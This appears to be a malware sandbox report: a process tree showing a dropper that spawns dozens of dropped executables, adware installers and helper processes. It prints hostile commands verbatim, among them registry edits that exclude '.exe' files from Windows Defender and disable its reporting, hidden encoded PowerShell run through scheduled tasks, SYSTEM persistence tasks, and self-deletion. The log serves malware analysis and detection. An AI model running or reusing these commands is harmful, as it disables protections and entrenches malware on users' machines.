dMx8nhhpXavZ4uPJ5zOMtF7f.exe PID 3796 wrote to memory of 3544 3796 control.exe rundll32.exe PID 3796 wrote to memory of 3544 3796 control.exe rundll32.exe PID 3796 wrote to memory of 3544 3796 control.exe rundll32.exe PID 2436 wrote to memory of 504 2436 lFyZ92vXmfbnHdGnC1PY_RhC.exe lFyZ92vXmfbnHdGnC1PY_RhC.exe PID 2436 wrote to memory of 504 2436 lFyZ92vXmfbnHdGnC1PY_RhC.exe lFyZ92vXmfbnHdGnC1PY_RhC.exe PID 2436 wrote to memory of 504 2436 lFyZ92vXmfbnHdGnC1PY_RhC.exe lFyZ92vXmfbnHdGnC1PY_RhC.exe PID 2436 wrote to memory of 504 2436 lFyZ92vXmfbnHdGnC1PY_RhC.exe lFyZ92vXmfbnHdGnC1PY_RhC.exe PID 1984 wrote to memory of 1016 1984 xqKmRxyI9yMan9smqcBne3I2.exe SETUP_~1.EXE PID 1984 wrote to memory of 1016 1984 xqKmRxyI9yMan9smqcBne3I2.exe SETUP_~1.EXE PID 1984 wrote to memory of 1016 1984 xqKmRxyI9yMan9smqcBne3I2.exe SETUP_~1.EXE PID 2436 wrote to memory of 504 2436 lFyZ92vXmfbnHdGnC1PY_RhC.exe lFyZ92vXmfbnHdGnC1PY_RhC.exe PID 2436 wrote to memory of 504 2436 lFyZ92vXmfbnHdGnC1PY_RhC.exe lFyZ92vXmfbnHdGnC1PY_RhC.exe PID 2436 wrote to memory of 504 2436 lFyZ92vXmfbnHdGnC1PY_RhC.exe lFyZ92vXmfbnHdGnC1PY_RhC.exe PID 2436 wrote to memory of 504 2436 lFyZ92vXmfbnHdGnC1PY_RhC.exe lFyZ92vXmfbnHdGnC1PY_RhC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"1⤵
- Checks computer location settings
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Minor Policy\vUAFUhj9jvoWazidiFp5wtjX.exe"C:\Users\Admin\Pictures\Minor Policy\vUAFUhj9jvoWazidiFp5wtjX.exe"2⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2832 -s 4763⤵
- Program crash
-
C:\Users\Admin\Pictures\Minor Policy\dMx8nhhpXavZ4uPJ5zOMtF7f.exe"C:\Users\Admin\Pictures\Minor Policy\dMx8nhhpXavZ4uPJ5zOMtF7f.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Minor Policy\dMx8nhhpXavZ4uPJ5zOMtF7f.exe"C:\Users\Admin\Pictures\Minor Policy\dMx8nhhpXavZ4uPJ5zOMtF7f.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\164adf43-3388-47f0-8c7f-57eba9c2a483" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
C:\Users\Admin\Pictures\Minor Policy\dMx8nhhpXavZ4uPJ5zOMtF7f.exe"C:\Users\Admin\Pictures\Minor Policy\dMx8nhhpXavZ4uPJ5zOMtF7f.exe" --Admin IsNotAutoStart IsNotTask4⤵
-
C:\Users\Admin\Pictures\Minor Policy\dMx8nhhpXavZ4uPJ5zOMtF7f.exe"C:\Users\Admin\Pictures\Minor Policy\dMx8nhhpXavZ4uPJ5zOMtF7f.exe" --Admin IsNotAutoStart IsNotTask5⤵
-
C:\Users\Admin\AppData\Local\65e788ba-e192-4869-80a8-bf3f3df42840\build2.exe"C:\Users\Admin\AppData\Local\65e788ba-e192-4869-80a8-bf3f3df42840\build2.exe"6⤵
-
C:\Users\Admin\AppData\Local\65e788ba-e192-4869-80a8-bf3f3df42840\build2.exe"C:\Users\Admin\AppData\Local\65e788ba-e192-4869-80a8-bf3f3df42840\build2.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\65e788ba-e192-4869-80a8-bf3f3df42840\build2.exe" & del C:\PrograData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\65e788ba-e192-4869-80a8-bf3f3df42840\build3.exe"C:\Users\Admin\AppData\Local\65e788ba-e192-4869-80a8-bf3f3df42840\build3.exe"6⤵
-
C:\Users\Admin\Pictures\Minor Policy\urnbMH0oDvkrvbrpwkSgNldb.exe"C:\Users\Admin\Pictures\Minor Policy\urnbMH0oDvkrvbrpwkSgNldb.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\R5K7Sai.CpL",3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\R5K7Sai.CpL",4⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\R5K7Sai.CpL",5⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\R5K7Sai.CpL",6⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Minor Policy\gWG8uPeowFtgqwbOzyuVCCwk.exe"C:\Users\Admin\Pictures\Minor Policy\gWG8uPeowFtgqwbOzyuVCCwk.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Minor Policy\J944jgl51CX33DHRnoas0zh1.exe"C:\Users\Admin\Pictures\Minor Policy\J944jgl51CX33DHRnoas0zh1.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\ZWuWYy0htiErP6uyYmeg_lrh.exe"C:\Users\Admin\Documents\ZWuWYy0htiErP6uyYmeg_lrh.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\bLEtFTHBvIMC_0CNOqyvtfQv.exe"C:\Users\Admin\Pictures\Adobe Films\bLEtFTHBvIMC_0CNOqyvtfQv.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=7474⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-4K5U4.tmp\bLEtFTHBvIMC_0CNOqyvtfQv.tmp"C:\Users\Admin\AppData\Local\Temp\is-4K5U4.tmp\bLEtFTHBvIMC_0CNOqyvtfQv.tmp" /SL5="$20236,11860388,791040,C:\Users\Admin\Pictures\Adobe Films\bLEtFTHBvIMC_0CNOqyvtfQv.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=7475⤵
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Adblock.exe6⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exe"cmd.exe" /c "reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f"6⤵
-
C:\Windows\system32\reg.exereg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f7⤵
-
C:\Users\Admin\Programs\Adblock\Adblock.exe"C:\Users\Admin\Programs\Adblock\Adblock.exe" --installerSessionId=e32e1c791664575903 --downloadDate=2022-09-30T22:10:44 --distId=marketator --pid=7476⤵
-
C:\Users\Admin\Programs\Adblock\crashpad_handler.exeC:\Users\Admin\Programs\Adblock\crashpad_handler.exe --no-rate-limit "--database=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" "--metrics-dir=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" --url=https://o428832.ingest.sentry.io:443/api/5420194/minidump/?sentry_client=sentry.native/0.4.12&sentry_key=06798e99d7ee416faaf4e01cd2f1faaf "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\3efe7bdd-1728-416d-b1ee-1d25945f9f58.run\__sentry-event" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\3efe7bdd-1728-416d-b1ee-1d25945f9f58.run\__sentry-breadcrumb1" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\3efe7bdd-1728-416d-b1ee-1d25945f9f58.run\__sentry-breadcrumb2" --initial-client-data=0x490,0x494,0x498,0x468,0x49c,0x7ff61d75bc80,0x7ff61d75bca0,0x7ff61d75bcb87⤵
-
C:\Users\Admin\AppData\Local\Temp\Update-3dad049a-eecb-4b7e-8e93-de3183ba8f33\AdblockInstaller.exe"C:\Users\Admin\AppData\Local\Temp\Update-3dad049a-eecb-4b7e-8e93-de3183ba8f33\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-MN447.tmp\AdblockInstaller.tmp"C:\Users\Admin\AppData\Local\Temp\is-MN447.tmp\AdblockInstaller.tmp" /SL5="$E004E,15557677,792064,C:\Users\Admin\AppData\Local\Temp\Update-3dad049a-eecb-4b7e-8e93-de3183ba8f33\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE8⤵
-
C:\Windows\system32\netsh.exeC:\Windows\system32\netsh.exe firewall add allowedprogram "C:\Users\Admin\Programs\Adblock\DnsService.exe" AdBlockFast ENABLE7⤵
- Modifies Windows Firewall
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -install7⤵
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe -start7⤵
-
C:\Windows\system32\cmd.exe"cmd.exe" /c "reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f"6⤵
-
C:\Windows\system32\reg.exereg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f7⤵
- Modifies registry key
-
C:\Users\Admin\Pictures\Adobe Films\raMWZlmzPzIWdy_mnHCloZxp.exe"C:\Users\Admin\Pictures\Adobe Films\raMWZlmzPzIWdy_mnHCloZxp.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" -y .\QXEL.eg5⤵
-
C:\Users\Admin\Pictures\Adobe Films\XGnhX4XLQ5xsCqwCSSpM2ZQp.exe"C:\Users\Admin\Pictures\Adobe Films\XGnhX4XLQ5xsCqwCSSpM2ZQp.exe"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "Get-WmiObject Win32_PortConnector"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\rWwyn2wp2r3f3edrLrpj0kDl.exe"C:\Users\Admin\Pictures\Adobe Films\rWwyn2wp2r3f3edrLrpj0kDl.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\rWwyn2wp2r3f3edrLrpj0kDl.exe"C:\Users\Admin\Pictures\Adobe Films\rWwyn2wp2r3f3edrLrpj0kDl.exe" -h5⤵
-
C:\Users\Admin\Pictures\Adobe Films\2xV1QhA_FyWHbC_Ts_agbR1z.exe"C:\Users\Admin\Pictures\Adobe Films\2xV1QhA_FyWHbC_Ts_agbR1z.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\2xV1QhA_FyWHbC_Ts_agbR1z.exe"C:\Users\Admin\Pictures\Adobe Films\2xV1QhA_FyWHbC_Ts_agbR1z.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\I208dVzUSqOgVhrIH_fKKOx5.exe"C:\Users\Admin\Pictures\Adobe Films\I208dVzUSqOgVhrIH_fKKOx5.exe"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "Get-WmiObject Win32_PortConnector"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\JXbJr960t8tSnYPT5IhyFDef.exe"C:\Users\Admin\Pictures\Adobe Films\JXbJr960t8tSnYPT5IhyFDef.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "Get-WmiObject Win32_PortConnector"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\E2wjsC5vzAhP_HKqoOZze8Cw.exe"C:\Users\Admin\Pictures\Adobe Films\E2wjsC5vzAhP_HKqoOZze8Cw.exe"4⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 48628 -s 4765⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\TMmcmtewDYqI46FoXf7L6Fil.exe"C:\Users\Admin\Pictures\Adobe Films\TMmcmtewDYqI46FoXf7L6Fil.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\LAV7x5ewRB4RkcWaAL7LsvZg.exe"C:\Users\Admin\Pictures\Adobe Films\LAV7x5ewRB4RkcWaAL7LsvZg.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\WnOCHbfMBNLXE8MdYNpZEpQB.exe"C:\Users\Admin\Pictures\Adobe Films\WnOCHbfMBNLXE8MdYNpZEpQB.exe"4⤵
-
C:\Windows\SysWOW64\robocopy.exerobocopy 89273873764872637456726738462763749829384862735682793849823849728345⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Provide.accdt & ping -n 5 localhost5⤵
-
C:\Windows\SysWOW64\cmd.execmd6⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq AvastUI.exe"7⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "avastui.exe"7⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq AVGUI.exe"7⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "avgui.exe"7⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^NpDypcc$" Corner.accdt7⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Quite.exe.pifQuite.exe.pif r7⤵
-
C:\Windows\SysWOW64\PING.EXEping -n 5 localhost6⤵
- Runs ping.exe
-
C:\Users\Admin\Pictures\Adobe Films\xhaTsPmO1_kZF84Iolej6VNT.exe"C:\Users\Admin\Pictures\Adobe Films\xhaTsPmO1_kZF84Iolej6VNT.exe"4⤵
-
C:\Windows\system32\cmd.execmd.exe /c "del C:\Users\Admin\Pictures\Adobe Films\xhaTsPmO1_kZF84Iolej6VNT.exe"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\6zvu9b8VWCUKOyr9XoVvRvbj.exe"C:\Users\Admin\Pictures\Adobe Films\6zvu9b8VWCUKOyr9XoVvRvbj.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSE465.tmp\Install.exe.\Install.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS2611.tmp\Install.exe.\Install.exe /S /site_id "525403"6⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&8⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:329⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:649⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:329⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:649⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "graDFOzvM" /SC once /ST 20:43:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "graDFOzvM"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "graDFOzvM"7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 22:13:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\PgPWXYK.exe\" d8 /site_id 525403 /S" /V1 /F7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\E2wmNUePF6O32h75mC_Ck9Zw.exe"C:\Users\Admin\Pictures\Adobe Films\E2wmNUePF6O32h75mC_Ck9Zw.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 48524 -s 4565⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 48524 -s 7685⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 48524 -s 7765⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 48524 -s 8245⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 48524 -s 8405⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 48524 -s 8685⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 48524 -s 8245⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 48524 -s 13565⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\RuyFkzGW\Cleaner.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\RuyFkzGW\Cleaner.exe"C:\Users\Admin\AppData\Local\Temp\RuyFkzGW\Cleaner.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 48524 -s 13805⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\SPZ393HzxUB1bmQbFruskOBR.exe"C:\Users\Admin\Pictures\Adobe Films\SPZ393HzxUB1bmQbFruskOBR.exe"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "Get-WmiObject Win32_PortConnector"5⤵
-
C:\Users\Admin\Pictures\Adobe Films\bpkZIh67SfrjIoXdygIq2sUj.exe"C:\Users\Admin\Pictures\Adobe Films\bpkZIh67SfrjIoXdygIq2sUj.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 48972 -s 3445⤵
- Program crash
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Minor Policy\GkkW3wKWJfoKEXtbVraCoY_5.exe"C:\Users\Admin\Pictures\Minor Policy\GkkW3wKWJfoKEXtbVraCoY_5.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 4563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 7683⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 7763⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 8203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 8403⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 9843⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 10123⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 13763⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0I37zX9TjWjwqWBUJqMxC\Cleaner.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\0I37zX9TjWjwqWBUJqMxC\Cleaner.exe"C:\Users\Admin\AppData\Local\Temp\0I37zX9TjWjwqWBUJqMxC\Cleaner.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 12403⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 12483⤵
- Program crash
-
C:\Users\Admin\Pictures\Minor Policy\p0AC6yBn3ASw6LWWgTDhKQqw.exe"C:\Users\Admin\Pictures\Minor Policy\p0AC6yBn3ASw6LWWgTDhKQqw.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSE94B.tmp\Install.exe.\Install.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS19D1.tmp\Install.exe.\Install.exe /S /site_id "525403"4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&6⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:327⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:647⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&6⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:327⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:647⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gEcIRDfjP" /SC once /ST 19:16:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gEcIRDfjP"5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gEcIRDfjP"5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 22:12:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\qSLPdIl.exe\" d8 /site_id 525403 /S" /V1 /F5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Minor Policy\xLmGFtewVGx31R1dEvJapWTf.exe"C:\Users\Admin\Pictures\Minor Policy\xLmGFtewVGx31R1dEvJapWTf.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Minor Policy\89H2U6T799E_xQqJCTJUsYKn.exe"C:\Users\Admin\Pictures\Minor Policy\89H2U6T799E_xQqJCTJUsYKn.exe"2⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
C:\Users\Admin\Pictures\Minor Policy\lFyZ92vXmfbnHdGnC1PY_RhC.exe"C:\Users\Admin\Pictures\Minor Policy\lFyZ92vXmfbnHdGnC1PY_RhC.exe"2⤵
- Executes dropped EXE
